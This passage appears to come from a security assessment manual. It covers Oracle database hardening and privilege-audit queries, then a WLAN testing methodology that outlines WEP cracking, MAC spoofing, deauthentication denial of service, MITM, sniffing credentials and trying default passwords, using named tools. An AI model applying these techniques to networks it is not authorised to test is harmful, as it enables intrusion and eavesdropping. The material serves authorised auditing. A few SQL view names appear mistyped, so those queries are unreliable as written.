profile, which gives no password or resource restrictions. We must modify this profile to
set its parameters appropriately.
You may execute the following query to get the values for the parameters in each profile
defined in the database:
SQL>Select * from DBA_PROFILES
Next, we describe each parameter, and its suggested value. Do keep in mind, though,
that these are only general recommendations and need to be carefully evaluated for
each specific instance. But the important thing is that the parameters must be changed
from their default settings. This can also be done by using a script called ‘utlpwdmg.sql’
found in $ORACLE_HOME/rdbms/admin.
Page 500 of 1123
The parameters of each Profile are of two types: Kernel and Password. Let us see the
Password parameters first:
FAILED_LOGIN_ATTEMPTS
The FAILED_LOGIN_ATTEMPTS parameter serves as a limit to the number of allowed
failed login attempts before the account is locked out. Setting this parameter to an
acceptable value ensures that no malicious user can try to guess passwords by
repeatedly trying to login. Setting this value limits the ability of unauthorized users to
guess passwords and alerts the DBA as to when password guessing occurs (accounts
display as locked). Once an account is locked, it cannot be logged on to for a specified
number of days or until the DBA unlocks the account. (See the Password Lock Time and
Password Reuse Time below). Default value: UNLIMITED, meaning never lock an
account.
Suggested value: A user must be locked out after at least 3 failed login
attempts. Ensure that this value is set to 3, or a maximum of 6 but never more than that.
PASSWORD_LOCK_TIME
When a particular user exceeds a designated number of failed login attempts, the server
automatically locks that user’s account. You must specify the permissible number of
failed login attempts using the FAILED_LOGIN ATTEMPTS parameter above. Here you
can specify the amount of time accounts remain locked. Default value: UNLIMITED
Suggested value: .0006
PASSWORD_LIFE_TIME
This parameter determines the maximum validity period for a password. The user must
change the password within the value of this parameter. This is one of the most critical
parameters and its value must be set strictly as recommended. Setting this value
ensures users are changing their passwords. Default value: UNLIMITED. Suggested
value: As per the security policy, this may be set to a value between 30-60 days.
PASSWORD_GRACE_TIME
Users enter the grace period upon the first attempt to log in to a database account after
their password has expired. During the grace period, a warning message appears each
time users try to log in to their accounts, and continues to appear until the grace period
Page 501 of 1123
expires. Users must change the password within the grace period. If the password is not
changed within the grace period, the account expires and no further logins to that
account are allowed until the password is changed. Default value: UNLIMITED, meaning
never require an account to change the password; Suggested value: 10
PASSWORD_REUSE_TIME
The PASSWORD_REUSE_TIME value specifies the number of days before a password
can be reused. PASSWORD_REUSE_TIME can be set to a specific number of days; to
UNLIMITED; or to DEFAULT, which uses the value indicated in the DEFAULT profile.
Default value: UNLIMITED, which allows passwords to be reused immediately.
PASSWORD_REUSE_TIME is mutually exclusive with PASSWORD_REUSE_MAX. If
PASSWORD_REUSE_TIME
is
set
to
a
value
for
a
given
profile,
PASSWORD_REUSE_MAX must be set to UNLIMITED for the same profile. And viceversa. Default value: UNLIMITED. Suggested value: 1800
PASSWORD_REUSE_MAX
This parameter determines the number of password changes a user must make before
he
can
re-use
his
current
password.
(Compare
this
with
the
PASSWORD_RESUE_TIME, wherein he can reuse his password if it is older than x
number of days). This along with the other parameters for the profile further increases
the impregnability of the user accounts. If PASSWORD_REUSE_MAX is set to a value
for a given profile, PASSWORD_REUSE_TIME must be set to UNLIMITED. Default
value:
UNLIMITED.
Suggested
value:
UNLIMITED
(assuming
PASSWORD_REUSE_TIME has been set appropriately).
PASSWORD_VERIFY_FUNCTION
The PASSWORD_VERIFY_FUNCTION value specifies a PL/SQL function to be used
for password verification when users who are assigned this profile log into a database.
This function can be used to validate password strength by requiring passwords to pass
a strength test written in PL/SQL. The function must be locally available for execution on
Page 502 of 1123
the database to which this profile applies. Oracle provides a default script
(utlpwdmg.sql), but you can also create your own function. The password verification
function must be owned by SYS. Default value: NULL, meaning no password verification
is performed. Suggested value: VERIFY_FUNCTION (found in the utlpwdmgr.sql script,
or one of your own.) As mentioned earlier, there exists a default script utlpwdmgr.sql to
do it for you. The values set by this script are the ones given here as suggested values.
You may change this script or use the ALTER PROFILE statement to set your own
values.
Finally, we have the Kernel parameters, which are to do with restrictions on resource
usage and help to prevent a Denial of Service situation. Again, the values given here are
only suggestions and you may have to test these on a development database before
applying them on a production setup.
COMPOSITE_LIMIT
Composite Resource Usage limits the total cost of resources used for a session. The
resource cost for a session is the weighted sum of the CPU time used in the session, the
connect time, the number of reads made in the session, and the amount of private SGA
space allocated. Its recommended value is 1000000
SESSIONS_PER_USER
Concurrent Sessions Resource Usage limits the number of connections that a user can
establish without releasing previous connections.
Its recommended value is 1
CPU_PER_SESSION
CPU/Session limits restrict the maximum amount of total CPU time allowed in a session.
The limit is expressed in seconds. Its recommended value is 1000000
CPU_PER_CALL
Page 503 of 1123
CPU/Call limits restrict the maximum amount of total CPU time allowed for a call (a
parse, execute, or fetch). The limit is also expressed in seconds. Its recommended value
is 1000000
LOGICAL_READS_PER_SESSION
Reads/Session Resource Usage limits restrict the total number of data block reads
allowed in a session. The limit includes blocks read from memory and disk. Its
recommended value is 50000
LOGICAL_READS_PER_CALL
Reads/Call Resource Usage limits restrict the Maximum number of data block reads
allowed for a call (a parse, execute, or fetch) to process a SQL statement. The limit
includes blocks read from memory and disk. Its recommended value is 5000
IDLE_TIME
This setting limits the maximum idle time allowed in a session. Idle time is a continuous
period of inactive time during a session. Long-running queries and other operations are
not subject to this limit. The limit is expressed in minutes. Setting an Idle Time Resource
Usage limit helps prevent users from leaving applications open when they are away from
their desks.
Its recommended value is 15
CONNECT_TIME
Connect Time Resource Usage limits restrict the maximum elapsed time allowed for a
session. The limit is expressed in minutes. Setting a Connect Time Resource Usage limit
helps prevent users from monopolizing a system and can ensure that resources are
released when a user leaves his workstation without logging off the system.
Its recommended value is 90
The default value for all of these parameters is UNLIMITED, and must be changed
according to the values suggested above or those found appropriate depending upon
available resources and expected peak usage.
Page 504 of 1123
H.2.1.4.6 ROLES AND PRIVILEGES
In Oracle, privileges are assigned to roles and roles are assigned to users. You can think
of roles in Oracle, as groups in Unix or Windows. This facilitates easier management of
users and privileges. Instead of assigning privileges to 100 users in the accounts
department, you can create one ACCOUNTS role, assign it the required privileges, and
then assign this role to all the 100 users. If in the future, you decide to remove a privilege
you had granted earlier, all you need to do is remove it from the role, and automatically
all the users assigned to that role will lose the privilege.
To see all the roles that exist in the database:
SQL>Select * from DBA_ROLES
To first see what roles have been granted to a given user, RAKESH:
SQL> Select GRANTEE, GRANTED_ROLE, ADMIN_OPTION, DEFAULT_ROLE from
DBA_ROLE_PRIVS where GRANTEE=’RAKESH’
Remember that roles can be assigned to users as well as to roles. An entire hierarchy of
roles can be created. For instance, you may create roles ACCOUNTS and PERSONNEL
for the respective departments, and a role MANAGEMENT for senior managers. If the
requirement is to provide MANAGEMENT privileges that have been granted to both
ACCOUNTS and PERSONNEL, then these roles can be assigned to MANAGEMENT.
As a result, to really know all the roles assigned to a user, you must repeatedly execute
the above query for the roles that appear in its result. We will see an example of how to
do this below.
Also, there is one critical role that you must ensure has not been assigned to any
application users: the RESOURCE role. This role includes privileges that are not
required by most application users, and a more restricted role must be granted:
SQL>Select * from DBA_ROLE_PRIVS where GRANTED_ROLE=’RESOURCE’
Another role that you must also check for, is the CONNECT role. This role grants critical
privileges such as CREATE TABLE, CREATE DATABASE LINK, and several others,
which are not required by the majority of database users. Instead of using the
Page 505 of 1123
CONNECT role to grant users access to Oracle, a special role must be created with only
the CREATE SESSION privilege, and then this role must be granted to all users. This
can be checked as follows:
SQL>Select * from DBA_ROLE_PRIVS where GRANTED_ROLE=’CONNECT’
Page 506 of 1123
Privileges are granted to users/roles using the GRANT statement and are removed using
the REVOKE statement. The possible object privileges in an Oracle database are:
Privilege
Authorization
Select
Read the information from a table or view
Update
Modify the contents of the table or view
Insert
Add new rows of data into a table or view
Delete
Delete one or more rows from a table or view
Execute
Execute or access a function or procedure
Alter
Modify an object’s parameters
Read
Read files in a directory
Reference
Create a constraint that refers to a table
Index
Create an index on a table
These are called object privileges, and are granted to users or roles on database objects
such as tables, views, procedures, functions, triggers, synonyms, indices, etc.
The second type of privilege is system privileges. These allow you to connect to the
database, affect database objects, and to create user objects such as tables, views,
indexes and stored procedures.
Page 507 of 1123
The syntax for granting privileges is:
SQL>grant <privilege> to <user or role>
To see what privileges a user is granted you must also see what privileges are granted
to the roles that he is assigned. Object and system privileges are stored in the
DBA_TAB_PRIVS and the DBA_SYS_PRIVS views. For RAKESH, check the object
privileges that have been granted:
SQL>Select
GRANTEE,
OWNER,
TABLE_NAME,
GRANTOR,
PRIVILEGE,
GRANTABLE from DBA_TAB_PRIVS where GRANTEE=’RAKESH’
You must also ensure that RAKESH has been granted only the appropriate privileges,
according to his functionality requirements.
Here, the GRANTOR and the OWNER can be two different users. This is possible
because of the GRANTABLE field. This field is also known as the ‘WITH GRANT
OPTION’. This option allows the grantee to further grant these privileges to users that he
wants to. This is a dangerous option and must be used sparingly.
To check all object privileges that have been assigned with the ‘WITH GRANT OPTION’:
SQL>Select * from DBA_TAB_PRIVS where GRANTABLE=’YES’
Finally, system privileges are stored in the view DBA_SYS_PRIVS. Some system
privileges are CREATE SESSION (to allow the user to connect to the oracle database),
CREATE TABLE, CREATE VIEW, etc. To check what actions RAKESH can do as far as
creating and manipulating the database objects is concerned:
SQL>Select GRANTEE, PRIVILEGE, ADMIN_OPTION from DBA_SYS_PRIVS where
GRANTEE=’RAKESH’
Once again, you must ensure that RAKESH has the most restrictive set of system
privileges. The other thing to note is the field ADMIN_OPTION. This is somewhat similar
to the field GRANTABLE in the object privileges view DBA_TAB_PRIVS. This field, also
known as, ‘WITH ADMIN OPTION’, allows the GRANTEE to grant these system
Page 508 of 1123
privileges to other users or roles. This is similar to the WITH GRANT OPTION for object
privileges and is very critical. To check for all privileges that have been assigned using
the WITH ADMIN OPTION:
SQL>Select * from DBA_SYS_PRIVS where ADMIN_OPTION=’YES’
To summarize, what we need to do is this:
Pick the user (or we can do this for all users), say RAKESH
Find out all the roles assigned to him:
SELECT * FROM DBA_ROLE_PRIVS where GRANTEE=’RAKESH’
Find out the object privileges granted to RAKESH and also to the roles that have been
assigned to RAKESH:
SELECT * from DBA_TAB_PRIVS where GRANTEE=’RAKESH’
Find out all system privileges granted to RAKESH and his roles:
SELECT * from DBA_SYS_PRIVS where GRANTEE=’RAKESH’
One role that this must specially be done for is PUBLIC. The PUBLIC role is like the
‘Everyone’ group in Windows. It cannot be removed, and every database user is
automatically assigned the PUBLIC role. On a default database, the PUBLIC role has a
really extensive list of permissions. It is highly recommended to complete REVOKE all
privileges and roles that have been granted to PUBLIC. Any privilege that stays with
PUBLIC is to be viewed as a critical security risk. In a default setup the output of this
command can be quite voluminous:
SQL>Select * from DBA_TAB_PRIVS where GRANTEE=’PUBLIC’
And
SQL>Select * from DBA_SYS_PRIVS where GRANTEE=’PUBLIC’
And
Page 509 of 1123
SQL>Select * from DBA_ROLES_PRIVS where GRANTEE=’PUBLIC’
Alternatively, you can query privileges based on the object name. For instance, the
SYS.LINK$ table contains plain-text passwords for database links (see section later),
and the SYS.AUD$ table contains the auditing trail, in case auditing has been turned on
and the audit destination is DB. Both these tables must be protected from lowerprivileges accounts. You can view the privileges on these tables with the query:
SQL>Select
*
from
DBA_TAB_PRIVS
where
TABLE_NAME
in
(‘SYS.LINK$’,
‘SYS.AUD$’)
It is preferable that privileges be granted to roles rather than to users. The advantages of
this have been mentioned at the start of this section. To check for those privileges that
have been granted directly to users:
SQL>Select * from DBA_TAB_PRIVS where GRANTEE in (Select * from DBA_USERS)
And
SQL>Select * from DBA_SYS_PRIVS where GRANTEE in (Select * from DBA_USERS)
Additionally, you also want to ascertain all object privileges that have been granted with
the ‘WITH GRANT OPTION’:
SQL>Select * from DBA_TAB_PRIVS where GRANTABLE=’YES’
And all system privileges that have been granted with the ‘WITH ADMIN OPTION’:
SQL>Select * from DBA_SYS_PRIVS where ADMIN_OPTION=’YES’
There is a certain subset of system privileges, which are granted using the keyword
ANY. For instance, a user can be granted the CREATE TABLE privilege, which allows
him to create tables within his own schema, but he can also be granted the CREATE
ANY TABLE privilege, which allows him to create tables in other users’ schemas as well.
This is once again a dangerous set of privileges and must be granted with extreme
caution. To check who has these privileges:
SQL>Select * from DBA_SYS_PRIVS where PRIVILEGE LIKE ‘%ANY%’
Page 510 of 1123
You also want to be very sure of why any users have been granted the DBA role:
SQL>Select * from DBA_ROLE_PRIVS where GRANTED_ROLE=’DBA’
The absolute minimum number of people must be granted this maximum privileges role.
Any extraneous additions to this role imply serious security flaws in the setup.
Next you must check for those users that are connected to the database at this point of
time, with DBA privileges:
SQL> Select username, SID, Status, Schema#, Server from SYS.V_$SESSION where
username in (Select username from DBA_ROLE_PRIVS where GRANTED_ROLE in
('SYS','DBA'))
The V_$SESSION view contains information about the current sessions, and we query it
for those users who are assigned to the SYS or the DBA roles. This again, must be a
minimum number and you must check that there are no multiple logins by two or more
users using the same DBA-level account. This results in a complete loss of
accountability. All users must have their own accounts with appropriate restricted
privileges.
You must also keep a check on all tables that are present in the SYS or SYSTEM
tablespaces. As mentioned earlier, these are privileges tablespaces and no user must
be allowed to create his own tables here. The best method is to run the following query
on a default installation and store it as a baseline for future comparisons, any new tables
popping up in the output must be investigated:
SQL>Select * from DBA_TABS where TABLESPACE_NAME in (‘SYS’, ‘SYSTEM’)
H.2.1.4.7 ORACLE AUDIT FUNCTIONALITY
For Oracle’s built-in auditing functionality, you must not only determine the rationale
behind the turning on of auditing, but also the level of auditing and its impact on system
resources. Oracle auditing gets turned on as soon as you set the AUDIT_TRAIL
parameter in the init<SID>.ora file. If this value is set to DB, then all entries go to
Page 511 of 1123
SYS.AUD$ table, if it is set to OS, then they go to the $ORACLE_HOME/rdbms/audit
directory. This location will be altered if the AUDIT_FILE_DEST parameter is set to a
different path.
In Oracle, we can audit the following:
‰
Statement Auditing: Audits on the type of SQL statement used, such as any
SQL statement on a table.
‰
Privilege Auditing: Audits use of a particular system privilege, such as CREATE
TABLE
‰
Object: Audits specific statements on specific objects such as ALTER PROFILE
on the DEFAULT profile.
You can set these auditing options and specify the following conditions:
‰
WHENEVER SUCCESSFUL/WHENEVER NOT SUCCESSFUL
‰
BY SESSION/BY ACCESS
The main problem with auditing is either too much information or too less information.
All audit entries go into the SYS.AUD$ table which must be secured with the tightest set
of permissions. It must also be recycled by exporting it to another table, and truncating it,
as it has a predefined size limit.
To view the current auditing options:
Statement Auditing
SQL>Select * From DBA_STMT_AUDIT_OPTS
Privilege Auditing
SQL>Select * from DBA_PRIV_AUDIT_OPTS
Object Auditing
SQL>Select * from DBA_OBJ_AUDIT_PRIVS
Page 512 of 1123
Ensure that the audit parameters are according to the rationale and requirement of the
organization’s audit policy.
The SYS.AUD$ table is bulky and difficult to analyze; therefore you must rely on the
numerous
views
created
on
this
table.
These
views
are
of
the
type:
DBA_AUDIT_<viewname>
Irrespective of the audit configuration, Oracle will always capture the following minimum
fields:
‰
User ID
‰
Session identifier
‰
Terminal identifier
‰
Name of the schema object accessed
‰
Operation performed or attempted
‰
Completion code of operation
‰
Date and time
‰
System privileges used
H.2.1.4.8 OAT
The Oracle Auditing Tools is a toolkit that could be used to audit security within Oracle
database servers.
The OAT use CREATE LIBRARY to be able to access the WinExec function in the
kernel32.dll in Windows or the system call in libc on Un*x. Having access to this function
makes it possible to execute anything on the server with the same security context as
the user who started the Oracle Service. So basically all accounts with default
passwords, or easy guessable password, having this privilege can do this.
The OAT have a built-in TFTP server for making file transfers easy. The tftp server is
based on the server source from www.gordian.com.
The Tools are Java based and were tested on both Windows and Linux. They should
hopefully also run on any other Java platform.
For more information on OAT visit http://www.cqure.net/tools.jsp?id=7
Page 513 of 1123
H.3 DATABASE SERVICES COUNTERMEASURES
•
The first and most important step is to remove default accounts, assign strong
passwords to existing accounts, and begin the audit facility for failed logins
•
At the network perimeter block access to database ports such as TCP 1433 and
UDP 1434 for SQL Server, and TCP 1521 for Oracle, and TCP 3306 for MySQL.
•
Keep the databases patched. This is easier said than done, since it is not trivial
to take a database system down for applying and testing patches. However,
those patches that address vulnerabilities, which can be exploited remotely
without authentication, must be given top priority. For instance, buffer overflows
in the TNS Listener service, or those in the SQL SSRS.
•
To protect from privilege escalation attacks, lock down the database
configuration by removing unnecessary stored and extended stored procedures,
reducing the privileges of default groups/roles such as PUBLIC, keeping the
privileges of existing user accounts to a minimum, and auditing access to critical
tables and views.
Page 514 of 1123
I WLAN SECURITY ASSESSMENT
I.1 WLAN SECURITY ASSESSMENT METHODOLOGY MAP
Information Gathering
Scanning
Audit
Analysis & Research
Exploit & Attack
Reporting
&
Presentation
Page 515 of 1123
I.2 BUILDING FOUNDATION
I.2.1 TYPES of WLAN Networks
802.11x …
What is the basic difference between the various types?
The IEEE 802.11 specification identifies an over-the-air interface between a mobile
device wireless client and a base station or between two mobile device wireless clients.
802.11a. An extension to the original IEEE 802.11 standard this provides up to 54 Mbps
in the 5 GHz band. 802.11a uses an orthogonal frequency division multiplexing encoding
scheme rather than FHSS (Frequency hopping spread spectrum )or DSSS(Direct
Sequence Spread Spectrum).
802.11b. An extension to the 802.11 wireless LAN standard, the first version of the
standard that was available it provides 11 Mbps transmission speed, could slow down to
5.5 Mbps, 2 Mbps, or 1 Mbps speeds in the 2.4 GHz band, depending upon the strength
of the signal. 802.11b uses only DSSS.
802.11g. The IEEE wireless standard came after b , applies to wireless LANs, 802.11g
provides 20 Mbps to 54 Mbps in the 2.4 GHz band. This standard is second most
popular currently just after 802.11b.
802.11e. The latest IEEE extension to provide quality-of-service (QoS) features and
multimedia support for home and business wireless environments.
I.2.2 MODES of WLAN Networks
•
Ad-hoc: The mobile devices in this mode are considered peers. Each mobile
device client communicates directly with the other mobile device clients within the
network.
Page 516 of 1123
•
Infrastructure: In this mode there are AP’s (access points) and clients. The clients
communicate with the AP’s and through the AP’s to other wired or wireless
clients.
I.2.3 Service Set Identifier
SSID or Service Set Identifier is a unique identifier specified in the header of wireless
packets to act as a password for client connectivity to a wireless access point. This is
commonly referred to as the wireless network name, and is broadcast on the wireless
network by the access point.
Use of default SSID, suggest default installations, which is not good. Check for all AP’s
with default SSID’s. Moreover, default SSID tells the make of wireless device. Such a list
of default SSID is available on cirt.net.
I.2.4 KEY MANAGEMENT
Different type of keys implemented in wireless – shared, dynamic
Pre shared keys are the traditional ways of doing a key exchange in wireless lans.
Dynamic key exchange is protocols such as 802.1x which allows keys to be dynamically
shared.
Possibility of exposure or theft of static encryption keys stored in the access points and
wireless stations. Dictionary attack on the sniffed data traffic can be performed.
I.2.5 ENCRYPTION
Wireless networks do not have physical connectivity restriction. The IEEE 802.11
standard specifies WEP as the wireless equivalent to the physical security provided by
wired networks. The WEP encryption scheme uses shared keys for the encryption and
decryption of the frames passed across a Wireless LAN (WLAN).
Page 517 of 1123
By default WEP is disabled.
WEP can also be discovered in a short period of time. Although WEP is based on the
robust RC4 symmetric key algorithm, the flaws in the implementation of WEP have been
well documented. These flaws allow a malicious user who collects enough WEP
encrypted frames on given network to identify shared values among the frames and
ultimately determine the shared key.
Tip: WEP provides the device authentication, is proper user authentication also in place?
Page 518 of 1123
I.2.6 Considerations on building a box for war-driving
Type of card, chipset, tools, operating system tweaks, external antenna etc…
Hardware
A Laptop with Windows XP/2000 and Linux installed as dual boot.
PCMCIA 802.11b Cards(11Mbps)
Hermes Chipset:
ORiNOCO Gold
External Antennas
Fab-Corp 5dBi Omnidirectional Magnetic Mount
Fab-Corp N-Type to ORiNOCO Pigtail
D-I-Y antennas are also okay
GPS and accessories
Garmin eTrex Legend
Garmin eTrex Power+Data Cable Bundle
Garmin eTrex Winshield suction cup mount
Misc
400 Watt Power inverter
Software:
NetStumbler
StumbVerter
MapPoint2002
NAI Sniffer
AiroPeek
Analyzer
ettercap
and all the other W32 sniffers (w&w/owifi support).
Windows XP MAC changer (SMAC)
Page 519 of 1123
I.3 TYPES OF THREATS
I.3.1 Eavesdropping
Two types of intrusion threats that are easy to launch are traffic monitoring and passive
eavesdropping.
Traffic monitoring is typically performed by an intruder that is outside the perimeter of the
enterprise, whereby he observes the traffic flow, and makes assessments about the
1) Nature of traffic,
2) Amount of traffic and
3) Load on the network.
Passive eavesdropping on the other hand generally occurs from within the perimeter.
The intruder could use the information gathered by way of traffic monitoring combined
with passive eavesdropping to attack users as well as the network.
I.3.2 Gaining Network knowledge by Traffic Analysis
WLAN Network Traffic Analysis should lead to the investigation of the following:
1. Sequence number
2. Control Type and Subtype
3. Destination MAC
4. Service Set Identifier (SSID)
5. Organizationally Unique Identifier (OUI)
6. Data Payload
7. LLC Protocol Type Field
8. LLC Protocol ID
I.3.3 Denial of Service
Denial of Service can be launched in various aspects, like:
1. Requesting every DHCP addresses using forged packets, thus legitimate clients
denied access.
Page 520 of 1123
2. Using Fake AP
3. Jamming the frequency of WLAN using conventional and freely available
equipments such as Microwave oven.
I.3.4 Password Capture
The password for remote management of access points can be captured and used to
gain unauthorised access to the access points. As such, administration of access points
should not be done over the WLAN. Instead, the access points should be administered
via the wired network or locally via the access point’s built-in COM ports.
I.3.5 MAC Capture
If the MAC Filtering is implemented then sniff for ARP, which is used to determine the
MAC to IP pairing for the hosts on the wireless network. ARP information is passed in
the clear between the clients and the AP. Conduct ARP related attacks such as sniffing,
hijacking, broadcasting, DOS, and cloning.
Page 521 of 1123
I.4 METHODOLOGY
I.4.1 Information Gathering
Wireless access points and clients send beacons and broadcasts respectively. Beacons
are sent by APs at predefined intervals. They are invitations and driving directions that
enable the client to find the AP and configure he appropriate settings to communicate. A
beacon announces the SSID and the channel that the network is using. WLAN scanners
allow users to identify WLANs through the use of a wireless network interface card (NIC)
running in promiscuous mode and software that will probe for APs. Linux has Kismet
which is not graphical and not as user friendly as NetStumbler, but it provides superior
functionality. Kismet is not only a WLAN scanner, but combines the features of a WLAN
sniffer.
I.4.2 Scanning
•
Detect and Identify the wireless network
•
Test for channels and ESSID
•
Test the beacon broadcast frame and recording of broadcast information
•
Test for rogue access points from outside the facility
•
IP address collection of access points and clients
•
MAC address collection of access points and clients
•
Detect and Identify the wireless network
I.4.3 Audit & Review – Questionnaire
Audit and Review Questionnaire on the following controls:
•
Implementation Controls
o
Access control
ƒ
Access control could be based upon the MAC address of the
connecting devices.
o
Firewall settings
ƒ
•
Between wire and wireless side
Technical Controls
•
Ports on Device
Page 522 of 1123
ƒ
The built-in COM ports of the access point should be disabled or
password protected to prevent any unauthorized access to the
access points. All unnecessary services and ports in the access
points should be removed or closed.
•
SNMP
ƒ
The default SNMP community string should be changed if the
access point has SNMP agent running on it. This is to prevent an
attacker from reading or writing to the access point.
•
Is the SSID Broadcast off?
•
Use of Default SSID name?
•
Beacon interval
ƒ
Beacon interval of SSID should be set to the maximum setting to
make passive scanning more difficult.
•
Management Controls
ƒ
Usage Policy
•
Try to find if any usage policy has been implemented on
the wireless device. E.g. linksys allows building such policy
based upon day/time.
I.4.4 Security Analysis and Research
•
Determining WEP enabled access points
•
Capturing WEP encrypted data
•
Intercepting valid client MAC addresses
•
Configuration menu access - using browser interface, using Telnet, using SNMP, using
FTP
•
Determine types of authentication methods in place
•
Determining the origin of the access point(s)
•
Communication with access point(s)
•
Utilization of client cards (with or without WEP)
•
Emphasize collecting data transmitted over the 802.11 wireless networks
•
Search for requested “specific” sensitive data
Page 523 of 1123
I.4.5 Exploitation & Attacks
•
Identifying WEP keys
Automated tools such WEPCrack would identify the WEPkeys from the traffic.
•
Bypassing MAC filtering
•
MAC filtering could be bypassed by any of the following tools
•
SMAC
o
This is a tool that allows the MAC in the windows machine to be changed.
This would help an attacker to spoof a MAC.
•
Bwmachak
o
Command line tool to change ORiNOCO PCMCIA Mac Address which
works on windows 2000 and Windows XP from blackwave.
•
Ifconfig
o
In a unix(linux) machine the ifconfig could be used to reassign the MAC
address.
•
Targeting authenticated data (i.e. usernames and passwords)
The use of protocol analyzers helps in the targeting of authenticated data , these
include ethereal, tcpdump (with scripts).
•
Network Logon functions
•
Disassociation attack
o
This is achieved by spoofed de authentication message causes the
communication between client and AP to be suspended. Hence, attacker
has achieved DoS. This could be achieved by using tools such as
AirJack , essid-jack and monkey-jack.
•
MITM Attack
MITM attacks on a wireless network are significantly easier to mount than against
physical networks, typically because such attacks on a wired network require
some sort of access to the network. Man-in-the-middle attacks take two common
forms:
o
eavesdropping
Page 524 of 1123
o
manipulation
In eavesdropping, an attacker listens to a set of transmissions to and from different
hosts even though the attacker's computer isnot a party to the transaction. Many
relate this type of attack to a leak, in which sensitive information could be disclosed
to a third party without the legitimate users' knowledge.
Manipulation attacks build on the capability of eavesdropping by taking this
unauthorized receipt of a data stream and changing its contents to suit a certain
purpose of the
Attacker this could include spoofing an IP address, changing a MAC address to
emulate another host, or some other type of modification. To prevent this kind of
attacks one must encrypt the contents of a data transmission at several levels,
preferably using SSH, SSL, or IPsec.
•
Brute force Base station Password
•
Scanning the Network and beyond
•
Identifying the services in the clients and trying to exploit them.
I.5 TOOLS USAGE
Objective
Tool
Method
Info. Gathering, Analysis & Research
•
Detect and Identify the wireless
network
Kismet
Check for Screen
•
Test for channels and ESSID
Check for Kismet*.csv
•
Test the beacon broadcast frame
Check for Kismet*.dump
and
recording
of
broadcast
information
•
Test for rogue access points from
Scan outside the facility
outside the facility
•
IP address collection of access
Check for Kismet*.csv
points and clients
•
MAC address collection of access
Check for Kismet*.csv
Page 525 of 1123
points and clients
•
Check for Screen
Detect and Identify the wireless
network
•
Check for Kismet*.csv
Determining WEP enabled access
points
•
Capturing WEP encrypted data
Check for Kismet*.dump
•
Intercepting
Change your Client Adapter’s
valid
client
MAC
-
addresses
MAC address to an authorized
MAC address
•
Use browser/Telnet/FTP with
Configuration menu access - using
browser interface, using Telnet,
using SNMP, using FTP
-
known default usernames &
passwords
and
SNMP
with
‘public’
•
methods in place
•
Scan the services running in the
Determine types of authentication
Communication
with
access
Nmap
Access Point to determine.
point(s)
•
To identify any interoperability
Utilization of client cards (with or
without WEP)
-
issues of Client Adapters with
Access Points, as a way of
protection.
•
Emphasize
collecting
transmitted
over
Collecting unWEP packets and
data
the Ethereal
Search
for
requested
sensitive data
them
to
see
data
packets.
802.11 wireless networks
•
decode
“specific”
Ethereal
Search for “specific” string in
data packets
Exploitation & Attacks
•
•
Identifying WEP Keys
WEPCrack
Use Kismet*.weak to get WEP
keys using WEPCrack
Impersonate
Bypassing MAC filtering
an
authorized
MAC address in your Client
-
Adapter with other credentials
such as SSID and if possible
WEP Keys.
Page 526 of 1123
•
Targeting authenticated data (i.e.
usernames and passwords)
•
Network Logon functions
•
Disassociation attack
•
Ethereal
Ethereal
AirJack
MITM Attack
Airjack
Decode and Search
Decode and Search
Sending
Association
Disassociation of frames
Capture the packet, modify it
and send it back.
•
Brute force Base station Password
-
Default Passwords
•
Scanning the Network and beyond
Nmap
Scan
•
Identifying
the
services
in
the
clients and trying to exploit them.
Nmap
or
Scan
Page 527 of 1123
I.6 EQUIPMENTS
I.6.1 Specialised equipment
Yellowjacket
www.bvsystems.com
This is specialised equipment that operates in the 802.11b space which could be easily
interfaced with handhelds; it could carry out analysis of frequency re-use patterns,
coverage mapping, and interference from neighbors, locating unauthorized users and for
war walks.
I.6.2 Cards
Orinoco
http://airsnort.shmoo.com/orinocoinfo.html
Prism2
http://www.linux-wlan.com/linux-wlan/
Cisco
http://airo-linux.sourceforge.net/
I.6.3 Antennas
There are three types of direction when it comes to classifying antennas: directional,
multidirectional, and omni directional. Directional antennas are also the type of antennas
that are most effective in long-range packet capturing because the power and waves are
tightly focused in one direction. Multidirectional antennas are similar to directional
antennas in the sense that both use highly concentrated and focused antennas for their
transceivers. An omni directional antenna is the most effective in close city driving
because it transmits and receives signals from all directions, thereby providing the
largest angular range.
Antenna manufacturers
HyperLinkTech
http://www.hyperlinktech.com
Wireless Central
http://www.wirelesscentral.net
Fleeman, Anderson, http://www.fab-corp.com/
and Bird Corporation
Page 528 of 1123
I.6.4 GPS
The Global positioning system provides a reference to any place on Earth in terms of
latitude and longitude.The GPS software keeps a real-time log of the device’s position by
mapping the longitude and latitude coordinates with corresponding timestamps into a
simple text file. GPS units are relatively easy to purchase and install on your laptop,
especially if you are on the Windows OS(Win 2k/XP).
GPS manufacturers
Garmin International http://www.garmin.com/
Magellan
http://www.magellangps.com/
I.7 SOFTWARE DESCRIPTION
Netstumbler
NetStumbler is a Windows-based war-driving tool that will detect wireless networks and
mark their relative position with a GPS.It uses an 802.11 Probe Request sent to the
broadcast destination address, which causes all access points in the area to issue an
802.11 Probe Response containing network configuration information, such as their
SSID and WEP status. When hooked up to a GPS, NetStumbler will record a GPS
coordinate for the highest signal strength found for each access point. Using the network
and GPS data, you can create maps with tools such as StumbVerter and Microsoft
MapPoint. NetStumbler supports the Hermes chipset cards on Windows 2000, the most
popular being the Orinoco branded cards. On Windows XP the NDIS 5.1 networking
library has 802.11 capabilities itself, which allows NetStumbler to be used with most
cards that support it.
Page 529 of 1123
Kismet
Kismet is a Linux and BSD-based wireless sniffer that has war-driving functionality. It
allows you to track wireless access points and their GPS locations like NetStumbler, but
offers many other features as well. Kismet is a passive network-detection tool that will
cycle through available wireless channels looking for 802.11 packets that indicate the
presence of a wireless LAN, such as Beacons and Association Requests. Kismet can
also gather additional information about a network if it can, such as IP addressing and
Cisco Discovery Protocol (CDP) names. Included with Kismet is a program called
GPSMap, which generates a map of the Kismet results. Kismet supports most of the
wireless cards available for Linux or OpenBSD. To use Kismet, you will first have to
install the custom drivers required for monitor mode operation. This can vary depending
on the chipset your card uses, but Kismet comes with a single way to enable all of them
for monitor operation.
Dstumbler
Wireless Mapping tools
StumbVerter(http://www.sonar-security.com/sv.html)
StumbVerter is a standalone application which allows you to import Network Stumbler's
summary files into Microsoft's MapPoint 2004 maps. The logged WAPs will be shown
with small icons, their colour and shape relating to WEP mode and signal strength.
GPSMap
Page 530 of 1123
This is a software that
makes it possible to create vectors maps, which can be
downloaded to Garmin GPS receivers.
JiGLE
JiGLE is a java client that lets you look at all the reported geographically-located 802.11
wireless base-stations in the any other area that has a 'MapPack' or 'MapTree' created
for it.It can also read in NetStumbler or DStumbler files and plot them on a map of your
